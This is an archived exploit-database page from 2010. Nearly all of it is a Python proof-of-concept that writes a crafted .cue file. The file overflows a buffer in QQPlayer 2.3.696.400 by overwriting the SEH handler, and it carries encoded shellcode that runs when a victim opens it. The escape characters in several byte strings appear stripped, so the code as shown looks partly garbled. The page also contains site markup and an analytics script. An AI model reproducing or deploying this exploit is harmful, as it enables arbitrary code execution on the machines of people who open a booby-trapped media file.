Home / os / win7

QQPlayer cue File Buffer Overflow Exploit

Posted on 21 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>QQPlayer cue File Buffer Overflow Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================
QQPlayer cue File Buffer Overflow Exploit
=========================================


#!/usr/bin/env python
 
#################################################################
#
# Title: QQPlayer cue File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400
# Vulnerable: QQPlayer&lt;=2.3.696.400p1
#
#################################################################
# Code :
 
head = '''FILE &quot;'''
junk = &quot;A&quot; * 780
nseh =&quot;x42x61x21x61&quot;
seh  =&quot;xa9x9ex41x00&quot;
adjust=&quot;x32x42x61x33xcax83xc0x10&quot;
shellcode=(&quot;hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o&quot;
           &quot;0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41&quot;
           &quot;H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK&quot;
           &quot;NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01&quot;)
junk_=&quot;R&quot;*8000
foot ='''.avi&quot; VIDEO'''+&quot;x0a&quot;'''TRACK 02 MODE1/8888'''+&quot;x0a&quot;+&quot;INDEX 08 08:08:08&quot;
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
 
fobj = open(&quot;poc.cue&quot;,&quot;w&quot;)
fobj.write(payload)
fobj.close()


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-21]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :